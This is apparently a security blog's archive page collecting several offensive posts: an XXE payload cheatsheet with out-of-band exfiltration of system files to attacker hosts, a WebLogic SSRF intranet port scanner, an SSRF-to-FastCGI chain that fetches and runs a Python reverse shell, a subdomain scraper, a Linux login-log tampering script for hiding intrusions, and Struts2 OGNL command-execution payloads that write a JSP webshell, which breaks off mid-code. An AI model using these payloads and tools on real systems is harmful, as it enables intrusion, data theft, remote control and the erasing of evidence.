XML Entity Cheatsheet - Updated

Published: February 22, 2016 // Categories: work log, dev notes, linux, reposted articles, windows // No Comments

An XML Entity testing cheatsheet. This is an updated version with nokogiri tests removed, just (X)XE notes.

XML Headers:

<?xml version="1.0" standalone="no"?>
<?xml version="1.0" standalone="yes"?>

Vanilla entity test:

<!DOCTYPE root [<!ENTITY post "1">]><root>&post;</root>

SYSTEM entity test (xxe):

<!DOCTYPE root [<!ENTITY post SYSTEM "file:///etc/passwd">]>

Parameter Entity. One benefit is that a parameter entity is automatically expanded inside the DOCTYPE:

<!DOCTYPE root [<!ENTITY % dtd SYSTEM "http://[IP]/some.dtd">%dtd;]>

Should be illegal per XML specs but I've seen it work, also useful for DoS:
<!DOCTYPE root [<!ENTITY % dtd SYSTEM "http://[IP]/some.dtd"><!ENTITY % a "test %dtd">]>

Combined Entity and Parameter Entity:

 

<!DOCTYPE root [<!ENTITY post SYSTEM "http://"><!ENTITY % dtd SYSTEM "http://[IP]/some.dtd"><!ENTITY % a "test %dtd">]><root>&post;</root>

URL handler. This follows XML Entity Examples - IBM (broken link, see the Internet Archive). I have not used this, but a Public DTD works just as well:

<!DOCTYPE root [<!ENTITY c PUBLIC "-//W3C//TEXT copyright//EN" "http://[IP]/copyright.xml">]>

XML Schema Inline:

<madeuptag xmlns="http://[IP]" xsi:schemaLocation="http://[IP]">
</madeuptag>

Remote Public DTD, from oxml_xxe payloads:

<!DOCTYPE roottag PUBLIC "-//OXML/XXE/EN" "http://[IP]">

External XML Stylesheet, from Burp Suite Release Notes:

<?xml-stylesheet type="text/xml" href="http://[IP]"?>

XInclude:

<document xmlns:xi="http://<IP>/XInclude"><footer><xi:include href="title.xml"/></footer></document>
<root xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include href="file:///etc/fstab" parse="text"/>

Inline XSLT:

<?xml-stylesheet type="text/xml" href="#mytest"?>
<xsl:stylesheet id="mytest" version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:fo="http://www.w3.org/1999/XSL/Format">
<!-- replace with your XSLT attacks -->
<xsl:import href="http://[ip]"/>
<xsl:template match="id('boom')">
  <fo:block font-weight="bold"><xsl:apply-templates/></fo:block>
</xsl:template>
</xsl:stylesheet>

Useful Links:

XML Schema, DTD, and Entity Attacks - A Compendium of Known Techniques
XML Entity Examples - IBM (Broken, check Internet Archive)

 

Some XXE payloads

https://gist.githubusercontent.com/staaldraad/01415b990939494879b4/raw/25cff41582552aee47b06526d568f5785af67deb/XXE_payloads

Vanilla, used to verify outbound xxe or blind xxe

<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>

 

OoB extraction

<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY % sp SYSTEM "http://x.x.x.x:443/ev.xml">
%sp;
%param1;
]>
<r>&exfil;</r>

External dtd:

<!ENTITY % data SYSTEM "file:///c:/windows/win.ini">
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://x.x.x.x:443/?%data;'>">

OoB variation of above (seems to work better against .NET)

<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY % sp SYSTEM "http://x.x.x.x:443/ev.xml">
%sp;
%param1;
%exfil;
]>

External dtd:

<!ENTITY % data SYSTEM "file:///c:/windows/win.ini">
<!ENTITY % param1 "<!ENTITY &#x25; exfil SYSTEM 'http://x.x.x.x:443/?%data;'>">

OoB extra nice

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
 <!ENTITY % start "<![CDATA[">
 <!ENTITY % stuff SYSTEM "file:///usr/local/tomcat/webapps/customapp/WEB-INF/applicationContext.xml ">
<!ENTITY % end "]]>">
<!ENTITY % dtd SYSTEM "http://evil/evil.xml">
%dtd;
]>
<root>&all;</root>

External dtd:

<!ENTITY all "%start;%stuff;%end;">

File-not-found exception based extraction

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [  
  <!ENTITY % one SYSTEM "http://attacker.tld/dtd-part" >
  %one;
  %two;
  %four;
]>

External dtd:

<!ENTITY % three SYSTEM "file:///etc/passwd">
<!ENTITY % two "<!ENTITY % four SYSTEM 'file:///%three;'>"> //you might need to encode this % (depends on your target) as: &#x25;

 

FTP

<?xml version="1.0" ?>
<!DOCTYPE a [ 
<!ENTITY % asd SYSTEM "http://x.x.x.x:4444/ext.dtd">
%asd;
%c;
]>
<a>&rrr;</a>

External dtd:

<!ENTITY % d SYSTEM "file:///proc/self/environ">
<!ENTITY % c "<!ENTITY rrr SYSTEM 'ftp://x.x.x.x:2121/%d;'>">

Inside SOAP body

<soap:Body><foo><![CDATA[<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://x.x.x.x:22/"> %dtd;]><xxx/>]]></foo></soap:Body>

Untested - WAF Bypass

<!DOCTYPE :. SYSTEM "http://"
<!DOCTYPE :_-_: SYSTEM "http://"
<!DOCTYPE {0xdfbf} SYSTEM "http://"

A simple WebLogic SSRF exploitation script

Published: November 16, 2015 // Categories: dev notes, code study, linux, python, windows // No Comments

#WebLogic SSRF And XSS (CVE-2014-4241, CVE-2014-4210, CVE-2014-4242)
#refer:http://blog.csdn.net/cnbird2008/article/details/45080055

This vulnerability can be used to scan the intranet. I built a simple probe for it before, but that was long ago and I had forgotten about it.

#!/usr/bin/env python
# -*- coding: utf-8 -*-
#WebLogic SSRF And XSS (CVE-2014-4241, CVE-2014-4210, CVE-2014-4242)
#refer:http://blog.csdn.net/cnbird2008/article/details/45080055

import re
import urlparse

def assign(service, arg):
    if service == 'www':
        return True, arg


def audit(arg):
    payload = 'uddiexplorer/SearchPublicRegistries.jsp?operator=http://0day5.com/robots.txt&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search'
    url = arg + payload
    code, head, res, errcode, _ = curl.curl('"%s"' % url)
    m = re.search('weblogic.uddi.client.structures.exception.XML_SoapException', res)
    if m:
        security_warning(url)

if __name__ == '__main__':
    from dummy import *
    audit(assign('www', 'http://www.example.com/')[1])

Recently, however, I needed to enumerate part of the intranet, so I modified the script to make large-scale scanning easier.

#!/usr/bin/env python  
# -*- coding: utf-8 -*- 
import re
import sys
import time
import thread
import requests
 
def scan(ip_str):
    ports = ('21','22','23','53','80','135','139','443','445','1080','1433','1521','3306','3389','4899','8080','7001','8000',)
    for port in ports:
        exp_url = "http://weblogic.0day5.com/uddiexplorer/SearchPublicRegistries.jsp?operator=http://%s:%s&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search"%(ip_str,port)

        try:
            response = requests.get(exp_url, timeout=15, verify=False)
            # SSRF check: this exception string appears when the request was forwarded
            re_sult1 = re.findall('weblogic.uddi.client.structures.exception.XML_SoapException',response.content)
            # "could not connect" means the port is closed or unreachable
            re_sult2 = re.findall('but could not connect',response.content)

            if len(re_sult1)!=0 and len(re_sult2)==0:
                print ip_str+':'+port

        except Exception, e:
            pass
        
def find_ip(ip_prefix):
    '''
    Given a prefix such as 192.168.1, scan every address in that /24.
    '''
    for i in range(1,256):
        ip = '%s.%s'%(ip_prefix,i)
        thread.start_new_thread(scan, (ip,))
        time.sleep(3)
     
if __name__ == "__main__":
    commandargs = sys.argv[1:]
    args = "".join(commandargs)
   
    ip_prefix = '.'.join(args.split('.')[:-1])
    find_ip(ip_prefix)

Results:

10.101.28.16:80
10.101.28.17:80
10.101.28.16:135
10.101.28.16:139
10.101.28.17:135
10.101.28.16:445
10.101.28.17:445
10.101.28.20:80
10.101.28.20:135
10.101.28.20:139
10.101.28.129:80
10.101.28.202:21
10.101.28.142:139
10.101.28.142:445
10.101.28.129:135
10.101.28.202:80
10.101.28.240:21
10.101.28.142:3389
10.101.28.142:7001

 

Not long ago I tried a challenge involving php + weblogic + FastCGI. SSRF + gopher has always been powerful, and lately it has become extremely popular; there is an article about it on drops: http://drops.wooyun.org/tips/16357. Briefly, the exploitation steps are:

nc -l -p 9000 >x.txt & go run fcgi_exp.go system 127.0.0.1 9000 /opt/discuz/info.php "curl YOURIP/shell.py|python"
php -f gopher.php

Save the payload into x.txt. A bash reverse shell did not work, so switch to a Python reverse shell. Then urlencode the payload and generate ssrf.php.

shell.py

import socket,subprocess,os  
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)  
s.connect(("yourip",9999))  
os.dup2(s.fileno(),0)  
os.dup2(s.fileno(),1)  
os.dup2(s.fileno(),2)  
p=subprocess.call(["/bin/bash","-i"]);

gopher.php

<?php
$p = str_replace("+", "%20", urlencode(file_get_contents("x.txt")));
file_put_contents("ssrf.php", "<?php header('Location: gopher://127.0.0.1:9000/_".$p."');?>");
?>

This successfully generates the exploit file ssrf.php.

Reverse shell

Start a listener on the VPS:

nc -lvv 9999

Trigger the SSRF:

http://0761e975dda0c67cb.jie.sangebaimao.com/uddiexplorer/SearchPublicRegistries.jsp?&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business%20location&btnSubmit=Search&operator=YOURIP/ssrf.php

If exploitation succeeds, the shell connects back.


Using third-party services for subdomain enumeration

Published: November 8, 2015 // Categories: dev notes, work log, linux, python, windows, misc // 1 Comment

Lately I have been using subDomainsBrute.py to brute-force subdomains, but its support for third-level domains is not great. A friend pointed out that http://i.links.cn/subdomain/ can be queried for this, so I ran a quick test and wrote a small script to make lookups easier.

#! /usr/bin/env python
# -*- coding: utf-8 -*-
import requests,re,sys

def get_domain(domain):
    headers = {
        "Content-Type": "application/x-www-form-urlencoded",
        "Referer": "http://i.links.cn/subdomain/",
    }
    payload = ("domain={domain}&b2=1&b3=1&b4=1".format(domain=domain))
    r = requests.post("http://i.links.cn/subdomain/", params=payload)
    file=r.text.encode('ISO-8859-1')
    regex = re.compile('value="(.+?)"><input')
    result=regex.findall(file)
    list = '\n'.join(result)
    print list

if __name__ == "__main__":
    commandargs = sys.argv[1:]
    args = "".join(commandargs)
    get_domain(args)

Comparing the results, it really did turn up third-level domains.

#!/usr/bin/env python
# encoding: utf-8

import re
import sys
import json
import time
import socket
import random
import urllib
import urllib2
import traceback

from bs4 import BeautifulSoup

# random User-Agent pool
USER_AGENTS = [
    "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)",
]


def random_useragent():
    return random.choice(USER_AGENTS)

def getUrlRespHtml(url):
    respHtml=''
    try:
        heads = {'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 
                'Accept-Charset':'GB2312,utf-8;q=0.7,*;q=0.7', 
                'Accept-Language':'zh-cn,zh;q=0.5', 
                'Cache-Control':'max-age=0', 
                'Connection':'keep-alive', 
                'Keep-Alive':'115',
                'User-Agent':random_useragent()}
     
        opener = urllib2.build_opener(urllib2.HTTPCookieProcessor())
        urllib2.install_opener(opener) 
        req = urllib2.Request(url)
        opener.addheaders = heads.items()
        respHtml = opener.open(req).read()
    except Exception:
        pass
    return respHtml

def links_get(domain):
    trytime = 0
    # data from links.cn is incomplete, so accuracy cannot be guaranteed
    domainslinks = []
    try:
        req=urllib2.Request('http://i.links.cn/subdomain/?b2=1&b3=1&b4=1&domain='+domain)
        req.add_header('User-Agent',random_useragent())
        res=urllib2.urlopen(req, timeout = 30)
        src=res.read()

        TempD = re.findall('value="http.*?">',src,re.S)
        for item in TempD:
            item = item[item.find('//')+2:-2]
            #result=socket.getaddrinfo(item,None)
            #print result[0][4]
            domainslinks.append(item)
            domainslinks={}.fromkeys(domainslinks).keys()
        return domainslinks

    except Exception, e:
        pass
        trytime += 1
        if trytime > 3:
            return domainslinks

def bing_get(domain):
    trytime = 0
    f = 1
    domainsbing = []
    # data from Bing is not complete either
    while True:
        try:            
            req=urllib2.Request('http://cn.bing.com/search?count=50&q=site:'+domain+'&first='+str(f))
            req.add_header('User-Agent',random_useragent()) 
            res=urllib2.urlopen(req, timeout = 30)
            src=res.read()
            TempD=re.findall('<cite>(.*?)<\/cite>',src)
            for item in TempD:
                item=item.split('<strong>')[0]
                item += domain
                try:
                    if not (item.startswith('http://') or item.startswith('https://')):
                        item = "http://" + item
                    proto, rest = urllib2.splittype(item)
                    host, rest = urllib2.splithost(rest) 
                    host, port = urllib2.splitport(host)
                    if port == None:
                        item = host
                    else:
                        item = host + ":" + port
                except:
                     print traceback.format_exc()
                     pass                           
                domainsbing.append(item)         
            if f<500 and re.search('class="sb_pagN"',src) is not None:
                f = int(f)+50
            else:
                subdomainbing={}.fromkeys(domainsbing).keys()
                return subdomainbing
                break
        except Exception, e:
            pass
            trytime+=1
            if trytime>3:
                return domainsbing

def google_get(domain):
    trytime = 0
    s=1
    domainsgoogle=[]
    # requires a hosts entry for Google (otherwise unreachable)
    while True:
        try:
            req=urllib2.Request('http://ajax.googleapis.com/ajax/services/search/web?v=1.0&q=site:'+domain+'&rsz=8&start='+str(s))
            req.add_header('User-Agent',random_useragent()) 
            res=urllib2.urlopen(req, timeout = 30)
            src=res.read()
            results = json.loads(src)
            TempD = results['responseData']['results']
            for item in TempD:
                item=item['visibleUrl'] 
                item=item.encode('utf-8')
                domainsgoogle.append(item)                
            s = int(s)+8
        except Exception, e:
            trytime += 1
            if trytime >= 3:
                domainsgoogle={}.fromkeys(domainsgoogle).keys()
                return domainsgoogle 

def Baidu_get(domain):
    domainsbaidu=[]
    try:
        pg = 10
        for x in xrange(1,pg):
            rn=50
            pn=(x-1)*rn
            url = 'http://www.baidu.com/baidu?cl=3&tn=baidutop10&wd=site:'+domain.strip()+'&rn='+str(rn)+'&pn='+str(pn)
            src=getUrlRespHtml(url)
            soup = BeautifulSoup(src)
            html=soup.find('div', id="content_left")
            if html:
                html_doc=html.find_all('h3',class_="t")
                if html_doc:
                    for doc in html_doc:
                        href=doc.find('a')
                        link=href.get('href')
                        # needs a second request to resolve the 302 redirect target [slow]
                        rurl=urllib.unquote(urllib2.urlopen(link.strip()).geturl()).strip()
                        reg='http:\/\/[^\.]+'+'.'+domain
                        match_url = re.search(reg,rurl)
                        if match_url:
                            item=match_url.group(0).replace('http://','')
                            domainsbaidu.append(item)
    except Exception, e:
        pass
        domainsbaidu={}.fromkeys(domainsbaidu).keys()

    return domainsbaidu

def get_360(domain):
    # data from 360 webscan is usually added by the site admins themselves, so accuracy is relatively high
    domains360=[]
    try:
        url = 'http://webscan.360.cn/sub/index/?url='+domain.strip()
        src=getUrlRespHtml(url)
        item = re.findall(r'\)">(.*?)</strong>',src)
        if len(item)>0:
            for i in xrange(1,len(item)):
                domains360.append(item[i])
        else:
            item = ''
            domains360.append(item)
    except Exception, e:
        pass
        domains360={}.fromkeys(domains360).keys()
    return domains360

def get_subdomain_run(domain):
    mydomains = []
    mydomains.extend(links_get(domain))
    mydomains.extend(bing_get(domain))
    mydomains.extend(Baidu_get(domain))
    mydomains.extend(google_get(domain))
    mydomains.extend(get_360(domain))
    mydomains = list(set(mydomains))

    return mydomains

if __name__ == "__main__":
   if len(sys.argv) == 2:
      print get_subdomain_run(sys.argv[1])
      sys.exit(0)
   else:
       print ("usage: %s domain" % sys.argv[0])
       sys.exit(-1)

 

python mysubdomain.py wooyun.org
['www.wooyun.org', 'zone.wooyun.org', 'summit.wooyun.org', 'ce.wooyun.org', 'drops.wooyun.org', 'wooyun.org', 'wiki.wooyun.org', 'z.wooyun.org', 'job.wooyun.org', 'zhuanlan.wooyun.org', 'www2d00.wooyun.org', 'test.wooyun.org', 'en.wooyun.org', 'api.wooyun.org', 'paper.wooyun.org', 'edu.wooyun.org']

2016-01-28: added Baidu and 360 search scraping.

python mysubdomain.py jd.cn

['temp1.jd.cn', 'ngb.jd.cn', 'www.fy.jd.cn', 'dangan.jd.cn', 'rd.jd.cn', 'bb.jd.cn', 'www.jd.cn', 'bjxc.jd.cn', 'www.xnz.jd.cn', 'jw.jd.cn', 'www.gsj.jd.cn', 'www.wuqiao.jd.cn', 'nlj.jd.cn', 'czj.jd.cn', 'www.smj.jd.cn', 'zfrx.jd.cn', 'www.jjjc.jd.cn', 'gtj.jd.cn', 'bbs.jd.cn', 'hbcy.jd.cn', 'lcsq.xnz.jd.cn', 'jtj.jd.cn', 'www.nkj.jd.cn', 'zx.jd.cn', 'www.daj.jd.cn', 'www.hbcy.jd.cn', 'slj.jd.cn', 'kfq.jd.cn', 'www.jxw.jd.cn', 'jwxxw.jd.cn', 'www.kx.jd.cn', 'qxj.jd.cn', 'www.sjj.jd.cn', 'www.jfw.jd.cn', 'www.dqz.jd.cn', 'yl.jd.cn', 'www.tw.jd.cn', 'www.qxj.jd.cn', 'www.dwzw.jd.cn', 'www.czj.jd.cn', 'www.ajj.jd.cn', 'www.gxs.jd.cn', 'www.dx.jd.cn', 'sjj.jd.cn', 'www.jtj.jd.cn', 'www.wjj.jd.cn', 'www.mzj.jd.cn', 'www.cgj.jd.cn', 'jsj.jd.cn', 'www.dangan.jd.cn', 'www.wlj.jd.cn', 'www.mj.jd.cn', 'www.zwz.jd.cn', 'www.sf.jd.cn', 'www.sbz.jd.cn', 'www.cl.jd.cn', 'fzb.jd.cn', 'ajj.jd.cn', 'www.rsj.jd.cn', 'www.jdz.jd.cn', 'www.xh.jd.cn', 'qzlxjysj.jd.cn', 'www.wjmj.jd.cn', 'www.sbdw.jd.cn', 'www.flower.jd.cn', 'www.kjj.jd.cn', 'www.yjj.jd.cn', 'wjj.jd.cn', 'jdz.jd.cn', 'www.cb.jd.cn', 'www.ptz.jd.cn', 'nkj.jd.cn', '333.jd.cn', 'www.dxs.jd.cn', 'www.cxy.jd.cn', 'www.wjz.jd.cn', 'www.fzb.jd.cn', 'login.jd.cn', 'ldj.jd.cn', 'jfw.jd.cn', 'www.zfcg.jd.cn', 'www.kfq.jd.cn', 'www.dhz.jd.cn', 'www.zfrx.jd.cn', 'www.rd.jd.cn', 'dxs.jd.cn', 'jggw.jd.cn', 'www.yilin.jd.cn', 'www.tjj.jd.cn', 'www.zfw.jd.cn', 'g.jd.cn', 'www.rc.jd.cn', 'yfsq.xnz.jd.cn', 'www.wqz.jd.cn', 'zfcg.jd.cn', 'fgj.jd.cn', 'hbj.jd.cn', 'fgw.jd.cn', 'www.acd.jd.cn', 'sfj.jd.cn', 'www.zx.jd.cn', 'kx.jd.cn', 'www.ylz.jd.cn', 'www.zhenwu.jd.cn', 'fcz.jd.cn', 'tjj.jd.cn', 'kjj.jd.cn', 'gjj.jd.cn', 'cl.jd.cn', 'www.njj.jd.cn', 'www.slj.jd.cn', 'www.ldj.jd.cn', 'www.jsj.jd.cn', 'zfw.jd.cn', 'news.jd.cn', 'tw.jd.cn', 'www.dgz.jd.cn', 'yjj.jd.cn', 'njj.jd.cn', 'www.jggw.jd.cn', 'www.gjj.jd.cn', 'www.kp.jd.cn', 'www.qx.jd.cn', 'lsj.jd.cn', 'www.hbj.jd.cn', 'www.gcz.jd.cn', 'rc.jd.cn', 'jd.cn', 'jgj.jd.cn', 'jjjc.jd.cn', 'www.wsj.jd.cn', 'rsj.jd.cn', 'www.syb.jd.cn', 'files.jd.cn', 'www.jgj.jd.cn', 'www.xjz.jd.cn', 'fkb.jd.cn', 'qx.jd.cn', 'gsl.jd.cn', 'ptz.jd.cn', 'zzb.jd.cn', 'www.zjj.jd.cn', 'www.rfb.jd.cn', 'cb.jd.cn', 'www.fgj.jd.cn', 'www.da.jd.cn', 'www.lsj.jd.cn', 'www.fcz.jd.cn', 'www.ngb.jd.cn', 'www.sbzs.jd.cn', 'sf.jd.cn', 'www.jsw.jd.cn']

 

Modifying Linux logs with Python (logtamper.py)

Published: September 28, 2015 // Categories: dev notes, linux, code study, reposted articles, python, misc // 1 Comment

    I often use xi4oyu's logtamper, which is extremely handy, but in some scenarios there is no way to compile it. So, based on the logtamper source and the Intersect source, I wrote a Python version; the parameters are about the same as the original.

Hide from the admin's w output (utmp):

python logtamper.py -m 1 -u b4dboy -i 192.168.0.188

Clear the login records of a given IP (wtmp):

python logtamper.py -m 2 -u b4dboy -i 192.168.0.188

Modify the last login time and location (lastlog):

python logtamper.py -m 3 -u b4dboy -i 192.168.0.188 -t tty1 -d 2014:05:28:10:11:12

Finally, double-check that the modification succeeded; you can use chown and touch to fix up the files' owner and timestamps. The code is as follows:

#!/usr/bin/env python
# -*- coding:utf-8 -*-
# mail: cn.b4dboy@gmail.com
 
import os, struct, sys
from pwd import getpwnam
from time import strptime, mktime
from optparse import OptionParser
 
UTMPFILE = "/var/run/utmp"
WTMPFILE = "/var/log/wtmp"
LASTLOGFILE = "/var/log/lastlog"
 
LAST_STRUCT = 'I32s256s'
LAST_STRUCT_SIZE = struct.calcsize(LAST_STRUCT)
 
XTMP_STRUCT = 'hi32s4s32s256shhiii4i20x'
XTMP_STRUCT_SIZE = struct.calcsize(XTMP_STRUCT)
 
 
def getXtmp(filename, username, hostname):
    xtmp = ''
    try:
        fp = open(filename, 'rb')
        while True:
            bytes = fp.read(XTMP_STRUCT_SIZE)
            if not bytes:
                break
 
            data = struct.unpack(XTMP_STRUCT, bytes)
            record = [(lambda s: str(s).split("\0", 1)[0])(i) for i in data]
            if (record[4] == username and record[5] == hostname):
                continue
            xtmp += bytes
    except:
        showMessage('Cannot open file: %s' % filename)
    finally:
        fp.close()
    return xtmp
 
 
def modifyLast(filename, username, hostname, ttyname, strtime):
    try:
        p = getpwnam(username)
    except:
        showMessage('No such user.')
 
    timestamp = 0
    try:
        str2time = strptime(strtime, '%Y:%m:%d:%H:%M:%S')
        timestamp = int(mktime(str2time))
    except:
        showMessage('Time format err.')
 
    data = struct.pack(LAST_STRUCT, timestamp, ttyname, hostname)
    try:
        fp = open(filename, 'wb')
        fp.seek(LAST_STRUCT_SIZE * p.pw_uid)
        fp.write(data)
    except:
        showMessage('Cannot open file: %s' % filename)
    finally:
        fp.close()
    return True
 
 
def showMessage(msg):
    print msg
    exit(-1)
 
 
def saveFile(filename, contents):
    try:
        fp = open(filename, 'w+b')
        fp.write(contents)
    except IOError as e:
        showMessage(e)
    finally:
        fp.close()
 
 
if __name__ == '__main__':
    usage = 'usage: logtamper.py -m 2 -u b4dboy -i 192.168.0.188\n \
        logtamper.py -m 3 -u b4dboy -i 192.168.0.188 -t tty1 -d 2015:05:28:10:11:12'
    parser = OptionParser(usage=usage)
    parser.add_option('-m', '--mode', dest='MODE', default='1' , help='1: utmp, 2: wtmp, 3: lastlog [default: 1]')
    parser.add_option('-t', '--ttyname', dest='TTYNAME')
    parser.add_option('-f', '--filename', dest='FILENAME')
    parser.add_option('-u', '--username', dest='USERNAME')
    parser.add_option('-i', '--hostname', dest='HOSTNAME')
    parser.add_option('-d', '--dateline', dest='DATELINE')
    (options, args) = parser.parse_args()
 
    if len(args) < 3:
        if options.MODE == '1':
            if options.USERNAME == None or options.HOSTNAME == None:
                showMessage('+[Warning]: Incorrect parameter.\n')
 
            if options.FILENAME == None:
                options.FILENAME = UTMPFILE
 
            # tamper
            newData = getXtmp(options.FILENAME, options.USERNAME, options.HOSTNAME)
            saveFile(options.FILENAME, newData)
 
        elif options.MODE == '2':
            if options.USERNAME == None or options.HOSTNAME == None:
                showMessage('+[Warning]: Incorrect parameter.\n')
 
            if options.FILENAME == None:
                options.FILENAME = WTMPFILE
 
            # tamper
            newData = getXtmp(options.FILENAME, options.USERNAME, options.HOSTNAME)
            saveFile(options.FILENAME, newData)
 
        elif options.MODE == '3':
            if options.USERNAME == None or options.HOSTNAME == None or options.TTYNAME == None or options.DATELINE == None:
                showMessage('+[Warning]: Incorrect parameter.\n')
 
            if options.FILENAME == None:
                options.FILENAME = LASTLOGFILE
 
            # tamper
            modifyLast(options.FILENAME, options.USERNAME, options.HOSTNAME, options.TTYNAME , options.DATELINE)
 
        else:
            parser.print_help()

from:http://www.secoff.net/archives/475.html

Struts2: OGNL execution when debug mode is enabled

Published: September 25, 2015 // Categories: ops work, dev notes, linux, windows, python, misc // No Comments

1. Test whether the target is vulnerable:

debug=command&expression=%23f%3d%23_memberAccess.getClass().getDeclaredField(%27allowStaticM%27%2b%27ethodAccess%27),%23f.setAccessible(true),%23f.set(%23_memberAccess,true),%23o%3d@org.apache.struts2.ServletActionContext@getResponse().getWriter(),%23o.println(%27[%27%2b%27ok%27%2b%27]%27),%23o.close()

2. Try executing a command:

debug=command&expression=new%20java.io.BufferedReader(new%20java.io.InputStreamReader(new%20java.lang.ProcessBuilder({%27id%27}).start().getInputStream())).readLine()

3. Get the web path:

debug=command&expression=%23f=%23_memberAccess.getClass().getDeclaredField(%27allowStaticMethodAccess%27),%23f.setAccessible(true),%23f.set(%23_memberAccess,true),%23req=@org.apache.struts2.ServletActionContext@getRequest(),%23resp=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),%23e=%23req.getRealPath(%27%27),%23resp.println(%23e),%23resp.close()

4. Write a shell. wget or curl both work; here is one way to write the shell directly:

cmd /c echo ^<%@page import="java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*"%^> ^<%! String Pwd="chopper"; String EC(String s,String c)throws Exception{return new String(s.getBytes("ISO-8859-1"),c);} Connection GC(String s)throws Exception{String[] x=s.trim().split("\r\n");Class.forName(x[0].trim()).newInstance(); Connection c=DriverManager.getConnection(x[1].trim());if(x.length^>2){c.setCatalog(x[2].trim());}return c;} void AA(StringBuffer sb)throws Exception{File r[]=File.listRoots();for(int i=0;i^<r.length;i++){sb.append(r[i].toString().substring(0,2));}} void BB(String s,StringBuffer sb)throws Exception{File oF=new File(s),l[]=oF.listFiles();String sT, sQ,sF="";java.util.Date dt; SimpleDateFormat fm=new SimpleDateFormat("yyyy-MM-dd HH:mm:ss");for(int i=0;i^<l.length;i++){dt=new java.util.Date(l[i].lastModified()); sT=fm.format(dt);sQ=l[i].canRead()?"R":"";sQ+=l[i].canWrite()?" W":"";if(l[i].isDirectory()){sb.append(l[i].getName()+"/\t"+sT+"\t"+l[i].length()+"\t"+sQ+"\n");} else{sF+=l[i].getName()+"\t"+sT+"\t"+l[i].length()+"\t"+sQ+"\n";}}sb.append(sF);} void EE(String s)throws Exception{File f=new File(s);if(f.isDirectory()){File x[]=f.listFiles(); for(int k=0;k^<x.length;k++){if(!x[k].delete()){EE(x[k].getPath());}}}f.delete();} void FF(String s,HttpServletResponse r)throws Exception{int n;byte[] b=new byte[512];r.reset(); ServletOutputStream os=r.getOutputStream();BufferedInputStream is=new BufferedInputStream(new FileInputStream(s)); os.write(("->"+"|").getBytes(),0,3);while((n=is.read(b,0,512))!=-1){os.write(b,0,n);}os.write(("|"+"<-").getBytes(),0,3);os.close();is.close();} void GG(String s, String d)throws Exception{String h="0123456789ABCDEF";int n;File f=new File(s);f.createNewFile(); FileOutputStream os=new FileOutputStream(f);for(int i=0;i^<d.length();i+=2) {os.write((h.indexOf(d.charAt(i))^<^<4^|h.indexOf(d.charAt(i+1))));}os.close();} void HH(String s,String d)throws Exception{File sf=new File(s),df=new File(d);if(sf.isDirectory()){if(!df.exists()){df.mkdir();}File z[]=sf.listFiles(); for(int j=0;j^<z.length;j++){HH(s+"/"+z[j].getName(),d+"/"+z[j].getName());} }else{FileInputStream is=new FileInputStream(sf);FileOutputStream os=new FileOutputStream(df); int n;byte[] b=new byte[512];while((n=is.read(b,0,512))!=-1){os.write(b,0,n);}is.close();os.close();}} void II(String s,String d)throws Exception{File sf=new File(s),df=new File(d);sf.renameTo(df);}void JJ(String s)throws Exception{File f=new File(s);f.mkdir();} void KK(String s,String t)throws Exception{File f=new File(s);SimpleDateFormat fm=new SimpleDateFormat("yyyy-MM-dd HH:mm:ss"); java.util.Date dt=fm.parse(t);f.setLastModified(dt.getTime());} void LL(String s, String d)throws Exception{URL u=new URL(s);int n;FileOutputStream os=new FileOutputStream(d); HttpURLConnection h=(HttpURLConnection)u.openConnection();InputStream is=h.getInputStream();byte[] b=new byte[512]; while((n=is.read(b,0,512))!=-1){os.write(b,0,n);}os.close();is.close();h.disconnect();} void MM(InputStream is, StringBuffer sb)throws Exception{String l;BufferedReader br=new BufferedReader(new InputStreamReader(is)); while((l=br.readLine())!=null){sb.append(l+"\r\n");}} void NN(String s,StringBuffer sb)throws Exception{Connection c=GC(s);ResultSet r=c.getMetaData().getCatalogs(); while(r.next()){sb.append(r.getString(1)+"\t");}r.close();c.close();} void OO(String s,StringBuffer sb)throws Exception{Connection c=GC(s);String[] t={"TABLE"};ResultSet r=c.getMetaData().getTables (null,null,"%",t); 
while(r.next()){sb.append(r.getString("TABLE_NAME")+"\t");}r.close();c.close();} void PP(String s,StringBuffer sb)throws Exception{String[] x=s.trim().split("\r\n");Connection c=GC(s); Statement m=c.createStatement(1005,1007);ResultSet r=m.executeQuery("select * from "+x[3]);ResultSetMetaData d=r.getMetaData(); for(int i=1;i^<=d.getColumnCount();i++){sb.append(d.getColumnName(i)+" ("+d.getColumnTypeName(i)+")\t");}r.close();m.close();c.close();} void QQ(String cs,String s,String q,StringBuffer sb)throws Exception{int i;Connection c=GC(s);Statement m=c.createStatement(1005,1008); try{ResultSet r=m.executeQuery(q);ResultSetMetaData d=r.getMetaData();int n=d.getColumnCount();for(i=1;i^<=n;i++){sb.append(d.getColumnName(i)+"\t|\t"); }sb.append("\r\n");while(r.next()){for(i=1;i^<=n;i++){sb.append(EC(r.getString(i),cs)+"\t|\t");}sb.append("\r\n");}r.close();} catch(Exception e){sb.append("Result\t|\t\r\n");try{m.executeUpdate(q);sb.append("Execute Successfully!\t|\t\r\n"); }catch(Exception ee){sb.append(ee.toString()+"\t|\t\r\n");}}m.close();c.close();} %^>^<% String cs=request.getParameter("z0")+"";request.setCharacterEncoding(cs);response.setContentType("text/html;charset="+cs); String Z=EC(request.getParameter(Pwd)+"",cs);String 